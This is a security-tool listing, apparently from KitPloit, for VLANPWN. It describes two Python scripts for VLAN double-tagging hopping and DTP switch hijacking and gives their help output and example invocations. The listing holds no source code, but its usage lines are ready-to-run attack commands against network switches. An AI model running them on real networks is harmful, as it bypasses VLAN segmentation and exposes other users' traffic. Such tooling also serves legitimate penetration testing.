VLANPWN - VLAN Attacks Toolkit
VLAN attacks toolkit
DoubleTagging.py - This tool is designed to carry out a VLAN Hopping attack. As a result of injection of a frame with two 802.1Q tags, a test ICMP request will also be sent.
DTPHijacking.py - A script for conducting a DTP Switch Spoofing/Hijacking attack. Sends a malicious DTP-Desirable frame, as a result of which the attacker's machine becomes a trunk channel. The impact of this attack is that you can bypass the segmentation of VLAN networks and see all the traffic of VLAN networks.
python3 DoubleTagging.py --help.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s. SS. SS. SS. SS. SS. SS. SS.sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%SSS S%S SS SS S%S SS`S. S%S SS S%S SS S%S S%S SS`S. S%SSS S%S SS SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S SS S%S SS SS S%S SS `sS%S SS SS S%S S%S SS `sS%S SS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:; SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,. `:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'VLAN Double Tagging inject tool. Jump into another VLAN!Author: @necreas1ng, <[email protected]>usage: DoubleTagging.py [-h] --interface INTERFACE --nativevlan NATIVEVLAN --targetvlan TARGETVLAN --victim VICTIM --attacker ATTACKERoptions: -h, --help show this help message and exit --interface INTERFACE Specify your network interface --nativevlan NATIVEVLAN Specify the Native VLAN ID --targetvlan TARGETVLAN Specify the target VLAN ID for attack --victim VICTIM Specify the target IP --attacker ATTACKER Specify the attacker IP
python3 DoubleTagging.py --interface eth0 --nativevlan 1 --targetvlan 20 --victim --attacker
python3 DTPHijacking.py --help.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s. SS. SS. SS. SS. SS. SS. SS.sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%SSS S%S SS SS S%S SS`S. S%S SS S%S SS S%S S%S SS`S. S%SSS S%S SS SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%SSS S%S SS SS S%S SS `sS%S SS SS S%S S%S SS `sS%SSS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:;SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,. `:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'DTP Switch Hijacking tool. Become a trunk!Author: @necreas1ng, <[email protected]>usage: DTPHijacking.py [-h] --interface INTERFACE options:-h, --help show this help message and exit--interface INTERFACE Specify your network interface
python3 DTPHijacking.py --interface eth0
Source: www.kitploit.com
VLANPWN - VLAN Attacks Toolkit
Reviewed by Zion3R
7:33 AM